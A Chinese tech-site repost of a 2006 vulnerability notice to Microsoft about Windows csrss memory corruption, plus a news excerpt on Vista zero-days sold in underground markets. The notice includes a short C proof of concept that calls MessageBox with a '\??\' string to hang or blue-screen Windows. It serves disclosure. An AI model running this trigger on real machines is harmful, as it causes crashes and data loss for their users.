Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 编程语言 > .NET > C#.NET > 最新vista漏洞Microsoft Windows csrss (?) memory corruption exploited in-the-wild
【标  题】:最新vista漏洞Microsoft Windows csrss (?) memory corruption exploited in-the-wild
【关键字】:vista,Microsoft,Windows,csrss,memory,corruption,exploited,in-the-wild
【来  源】:http://blog.csdn.net/iiprogram/archive/2006/12/23/1456335.aspx

最新vista漏洞Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Your Ad Here

Dear Secure@microsoft.com,

 On  one  of  Russian  forum  security  vulnerability  is  discussed in
 Microsoft Windows (Windows XP is tested). A vulnerability is caused by
 memory  corruption  is  string  beginning  with  "\?\" is send thorugh
 MessageBox  API  with MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug"  feature  not  cleaned  out  in  final release and it seems to
 exploitable to code execution at kernel level. Code example below:


#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
 MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

System hangs, crashes (BSOD) or reboots. 

Underground hackers are hawking zero-day exploits for Microsoft's new Windows Vista operating system at $50,000 a pop, according to computer security researchers at Trend Micro.

The Windows Vista exploit—which has not been independently verified—was just one of many zero-days available for sale at an auction-style marketplace infiltrated by the Tokyo-based anti-virus vendor.

In an interview with eWEEK, Trend Micro's chief technology officer, Raimund Genes, said prices for exploits for unpatched code execution flaws are in the $20,000 to $30,000 range, depending on the popularity of the software and the reliability of the attack code.

Bots and Trojan downloaders that typically hijack Windows machines for use in spam-spewing botnets were being sold for about $5,000, Genes said.

 

Microsoft Windows XP/2003/Vista memory corruption 0day:【上一篇】
透明背景理解:【下一篇】
【相关文章】
  • Microsoft Windows XP/2003/Vista memory corruption 0day
  • WINDOWS VISTA 使用心得(二)
  • windows下的banner
  • Windows Mobile 5.0 (3) -- 在Mobile Web Form中使用javascript
  • 发布一个实用美观的Vista Sidebar Gadget (代表博客园参赛)
  • 昨天装Vista碰到的问题以及解决方案
  • 不是我舍不得 - .NET里面的Out Of Memory
  • 获取windows服务器网卡
  • Memory Mapped Vs I/O Mapped Vs others
  • 在Linux中加载Windows2000的NTFS格式
  • 【随机文章】
  • PHP调用三种数据库的方法(2)
  • 注意Windows注册表里加载的病毒和流氓软件!
  • 大家怎么样处理自己多台计算机的文件同步啊?
  • 用最简单的办法,实现最好的打印(用BCB调用WORD的打印功能)
  • 小谈SDO
  • 今天才认识到接收邮件的Subject的编码问题
  • 雾坐标扩展(EXT_fog_coord)
  • 配置Web应用环境实现JSP留言簿
  • 初学Javascript之cookie篇(译)
  • 澄清事实
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 bbb软讯网络 All Rigths Reserved.